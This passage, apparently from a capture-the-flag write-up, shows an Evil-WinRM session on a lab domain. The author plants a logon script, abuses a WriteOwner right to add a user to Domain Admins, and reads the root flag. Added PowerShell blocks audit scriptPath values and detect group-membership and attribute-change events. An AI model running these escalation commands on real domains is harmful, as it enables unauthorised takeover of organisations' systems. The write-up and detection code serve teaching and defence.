We can even copy folders/files from this user to a directory we want. I am copying a file from the user's Desktop folder to a specific folder I already have access to.

*Evil-WinRM* PS C:\ProgramData> echo "copy \users\maria\desktop\Engines.xls \programdata\" > cmd.ps1
*Evil-WinRM* PS C:\ProgramData> ls


    Directory: C:\ProgramData


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       10/21/2021   3:13 AM                Microsoft
d-----       10/21/2021  12:05 AM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        4/10/2020   5:48 AM                ssh
d-----        4/10/2020  10:49 AM                USOPrivate
d-----        4/10/2020  10:49 AM                USOShared
d-----        8/25/2021   2:57 AM                VMware
-a----        7/29/2022   1:32 AM            108 cmd.ps1
-a----       10/26/2021   8:13 AM           6144 Engines.xls
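
Added example (not part of the original post): an audit of the scriptPath attribute that the logon-script technique above relies on. A legitimate value is normally a file name relative to the domain's NETLOGON share or a UNC path into NETLOGON/SYSVOL; an absolute local path like the one set on maria, or a UNC to an unrelated host, deserves a look. The classification rules are my assumptions, the domain name is taken from this page, and the sample users are constructed.

```powershell
# Added example (not part of the original post): audit the scriptPath attribute that the logon-script
# technique above abuses. Classification rules are assumptions for illustration.

function Test-LogonScriptPath {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [object] $User,   # needs SamAccountName and ScriptPath
        [string] $DomainDnsName = 'object.local'                    # domain whose NETLOGON/SYSVOL shares are trusted
    )
    begin {
        # Matches \\<host>object.local\netlogon\... or \\<host>object.local\sysvol\... (case-insensitive by default)
        $domainShare = '^\\\\[^\\]*' + [regex]::Escape($DomainDnsName) + '\\(netlogon|sysvol)\\'
    }
    process {
        $path = "$($User.ScriptPath)"
        if (-not $path) { return }
        $verdict = switch -Regex ($path) {
            '^[A-Za-z]:\\'      { 'SUSPICIOUS: absolute local path'; break }
            $domainShare        { 'OK: UNC into domain NETLOGON/SYSVOL'; break }
            '^\\\\'             { 'SUSPICIOUS: UNC to a host outside the domain shares'; break }
            '\.(ps1|exe|hta)$'  { 'REVIEW: unusual script type for a NETLOGON script'; break }
            default             { 'OK: relative to NETLOGON' }
        }
        [pscustomobject]@{ SamAccountName = $User.SamAccountName; ScriptPath = $path; Verdict = $verdict }
    }
}

# Live use (the attribute is readable by any domain user):
#   Get-ADUser -Filter 'ScriptPath -like "*"' -Properties ScriptPath | Test-LogonScriptPath

# Constructed sample including the value set on maria above.
$sample = @(
    [pscustomobject]@{ SamAccountName = 'maria';    ScriptPath = 'C:\\programdata\\cmd.ps1' }
    [pscustomobject]@{ SamAccountName = 'smith';    ScriptPath = 'logon.bat' }
    [pscustomobject]@{ SamAccountName = 'oliver';   ScriptPath = '\\object.local\netlogon\scripts\map.vbs' }
    [pscustomobject]@{ SamAccountName = 'ava';      ScriptPath = '\\10.10.14.4\share\run.ps1' }
    [pscustomobject]@{ SamAccountName = 'noscript'; ScriptPath = $null }   # skipped: nothing set
)
$sample | Test-LogonScriptPath | Format-Table -AutoSize
```

maria and ava are flagged SUSPICIOUS, smith and oliver come back OK, and the user with no scriptPath is skipped. The same rule set can be applied to the whenChanged timestamp if you only want recently modified values.
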

Changing the group owner with the WriteOwner privilege

In this case the user has the privileges below, in particular WriteOwner:


AceType               : AccessAllowed
ObjectDN              : CN=maria garcia,CN=Users,DC=object,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength          : 0
ObjectSID             : S-1-5-21-4088429403-1159899800-2753317549-1106
InheritanceFlags      : ContainerInherit
BinaryLength          : 24
IsInherited           : True
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-32-544
AccessMask            : 983485
AuditFlags            : None
AceFlags              : ContainerInherit, Inherited

The above is the filtered output of this command: Get-ObjectAcl -SamAccountName Maria -ResolveGUIDs | ? {$_.ActiveDirectoryRights}

With this permission, I can make user "maria" the owner of the Domain Admins group, grant her full rights on it, and add her to the group like this:

*Evil-WinRM* PS C:\ProgramData> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\ProgramData> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\ProgramData> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
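
Added example (not part of the original post): the detection side of the changes made in this post. On a domain controller, adding a member to a security group raises Security events 4728/4732/4756 (global, local and universal groups), and with "Audit Directory Service Changes" enabled every attribute write on an object raises event 5136 carrying the attribute name and new value, which covers the scriptPath, servicePrincipalName and security descriptor changes seen earlier. The group and attribute lists are assumptions; the sample events are constructed in the shape the converter function produces.

```powershell
# Added example (not part of the original post): detection logic for the changes made in this post,
# run over Security-log events from a domain controller. Event IDs used: 4728/4732/4756 (member added
# to a security group) and 5136 (directory service object modified; needs "Audit Directory Service
# Changes" enabled). The group and attribute lists are assumptions for illustration.

function ConvertFrom-SecurityEvent {
    # Turn a Get-WinEvent record into Id, Time and a name->value table of its EventData fields.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        $xml  = [xml]$Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{ Id = [int]$Event.Id; Time = $Event.TimeCreated; Data = $data }
    }
}

function Find-PrivilegeChange {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [object] $Event,   # output of ConvertFrom-SecurityEvent
        [string[]] $PrivilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'Schema Admins'),
        # Attributes whose modification usually means a permission or persistence change
        [string[]] $SensitiveAttributes = @('nTSecurityDescriptor', 'servicePrincipalName', 'scriptPath', 'member',
                                            'msDS-AllowedToActOnBehalfOfOtherIdentity')
    )
    process {
        $d = $Event.Data
        switch ($Event.Id) {
            { $_ -in 4728, 4732, 4756 } {
                if ($PrivilegedGroups -contains $d['TargetUserName']) {
                    [pscustomobject]@{ Time = $Event.Time; Id = $Event.Id; Actor = $d['SubjectUserName']
                                       What = "added $($d['MemberName']) to $($d['TargetUserName'])" }
                }
            }
            5136 {
                if ($SensitiveAttributes -contains $d['AttributeLDAPDisplayName']) {
                    [pscustomobject]@{ Time = $Event.Time; Id = $Event.Id; Actor = $d['SubjectUserName']
                                       What = "modified $($d['AttributeLDAPDisplayName']) on $($d['ObjectDN']) = $($d['AttributeValue'])" }
                }
            }
        }
    }
}

# Live use on a domain controller (requires rights to read the Security log):
#   Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4728, 4732, 4756, 5136 } -MaxEvents 5000 |
#       ConvertFrom-SecurityEvent | Find-PrivilegeChange | Format-Table -AutoSize

# Constructed sample events in the shape ConvertFrom-SecurityEvent produces, mirroring the actions above.
$sample = @(
    [pscustomobject]@{ Id = 5136; Time = (Get-Date '2022-07-29 01:30:00'); Data = @{
        SubjectUserName = 'smith'; ObjectDN = 'CN=maria garcia,CN=Users,DC=object,DC=local'
        AttributeLDAPDisplayName = 'scriptPath'; AttributeValue = 'C:\\programdata\\cmd.ps1' } }
    [pscustomobject]@{ Id = 5136; Time = (Get-Date '2022-07-29 01:31:00'); Data = @{
        SubjectUserName = 'maria'; ObjectDN = 'CN=maria garcia,CN=Users,DC=object,DC=local'
        AttributeLDAPDisplayName = 'description'; AttributeValue = 'Marketing' } }   # benign, not reported
    [pscustomobject]@{ Id = 4728; Time = (Get-Date '2022-07-29 01:32:00'); Data = @{
        SubjectUserName = 'maria'; MemberName = 'CN=maria garcia,CN=Users,DC=object,DC=local'
        TargetUserName = 'Domain Admins' } }
)
$sample | Find-PrivilegeChange | Format-Table -AutoSize
```

The sample produces two alerts (the scriptPath write by smith and the Domain Admins addition by maria) and ignores the description change. In a real environment a membership change to Domain Admins that is not tied to a change ticket should page someone immediately.
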

We can see the group membership here:

*Evil-WinRM* PS C:\ProgramData> net user maria
User name                    maria
Full Name                    maria garcia
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2021 9:16:32 PM
Password expires             Never
Password changeable          10/22/2021 9:16:32 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 C:\\programdata\\cmd.ps1
User profile
Home directory
Last logon                   7/29/2022 1:32:52 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Admins        *Domain Users

After logging out and back in, the group details:

PS C:\Users\maria\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                           Attributes
============================================= ================ ============================================= ===============================================================
Everyone                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users               Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins                          Group            S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias            S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level          Label            S-1-16-12288

We now have full permission on the Administrator user's directories:

*Evil-WinRM* PS C:\users\Administrator\Desktop> type root.txt
bde8